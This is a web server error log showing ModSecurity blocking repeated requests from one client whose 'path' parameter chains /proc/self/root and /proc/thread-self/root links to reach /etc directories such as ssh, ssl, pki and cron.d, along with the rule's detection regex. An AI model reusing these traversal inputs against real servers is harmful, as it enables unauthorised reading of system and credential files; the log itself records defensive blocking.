[Thu Mar 19 15:08:39.094182 2026] [:error] [pid 7235:tid 140411565680384] [client 74.7.243.128:36982] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw7p_qxLDW4GITHUkSJEAAAARU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:08:47.093834 2026] [proxy_fcgi:error] [pid 30077:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:51924] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:08:48.497518 2026] [:error] [pid 7545:tid 140411632822016] [client 74.7.243.128:53214] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw7sH8B84UptSoTJtYv5wAAAY0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:08:55.847010 2026] [:error] [pid 30077:tid 140411641214720] [client 74.7.243.128:49282] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw7t_u8EFLIOrSqIpvI1AAAAkw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:09:01.861048 2026] [:error] [pid 30077:tid 140411607643904] [client 74.7.243.128:37272] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw7vfu8EFLIOrSqIpvI1wAAAlA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:09:02.107846 2026] [:error] [pid 30077:tid 140411599251200] [client 74.7.243.128:37272] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw7vvu8EFLIOrSqIpvI2AAAAlE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:09:06.551322 2026] [:error] [pid 19655:tid 140411725141760] [client 74.7.243.128:37286] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw7wk1ujooLWdUDGy7z0AAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:09:09.368814 2026] [:error] [pid 19655:tid 140411632822016] [client 74.7.243.128:37290] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw7xU1ujooLWdUDGy7z0wAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:09:11.845509 2026] [:error] [pid 20435:tid 140411658000128] [client 74.7.243.128:38624] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw7x5JaM1-0uhhUQJM6GwAAAIo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:09:14.529559 2026] [:error] [pid 14269:tid 140411616036608] [client 74.7.243.128:38628] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw7ygbLMZ6AikZjR9V9TQAAAA8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:09:17.614692 2026] [:error] [pid 7235:tid 140411708356352] [client 74.7.243.128:38638] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw7zfqxLDW4GITHUkSJGQAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:09:21.125816 2026] [proxy_fcgi:error] [pid 27293:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:53422] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:09:21.977071 2026] [:error] [pid 19655:tid 140411708356352] [client 74.7.243.128:52108] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw70U1ujooLWdUDGy7z2QAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:09:26.959204 2026] [:error] [pid 20435:tid 140411699963648] [client 74.7.243.128:52122] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw71pJaM1-0uhhUQJM6IQAAAIU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:09:32.727055 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.243.128:60956] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw73OoXxyEfFpUF8f8s3AAAAUk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:09:39.903344 2026] [:error] [pid 21219:tid 140411607643904] [client 74.7.243.128:60230] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw74_XLqtnMIWvjpaI-jAAAApA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:09:44.212468 2026] [proxy_fcgi:error] [pid 7545:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:54342] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:09:50.049424 2026] [:error] [pid 14269:tid 140411607643904] [client 74.7.243.128:46594] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw77QbLMZ6AikZjR9V9ZAAAABA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:10:00.362955 2026] [:error] [pid 7893:tid 140411691570944] [client 74.7.243.128:47202] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw7-BCii7xarUs8iHYJ9gAAAgY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:10:07.161790 2026] [proxy_fcgi:error] [pid 15826:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:55270] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:10:12.682482 2026] [:error] [pid 17887:tid 140411699963648] [client 74.7.243.128:38642] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw8BAkwaGbbGflqUZDqlQAAAMU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:10:32.774939 2026] [:error] [pid 17887:tid 140411741927168] [client 74.7.243.128:53262] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw8GAkwaGbbGflqUZDqoQAAAMA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:10:34.129812 2026] [proxy_fcgi:error] [pid 7235:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:56268] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:10:40.488959 2026] [:error] [pid 27293:tid 140411674785536] [client 74.7.243.128:48750] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw8IP-YZRR_7pZ7nDKrowAAA8g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:10:50.252462 2026] [:error] [pid 21563:tid 140411733534464] [client 74.7.243.128:37608] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw8KUpm7ZmxKZTM4bZk0gAAA4E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 15:10:56.130759 2026] [proxy_fcgi:error] [pid 20435:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:57330] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 15:10:59.930672 2026] [:error] [pid 14269:tid 140411683178240] [client 74.7.243.128:47140] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abw8MwbLMZ6AikZjR9V9ggAAAAc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
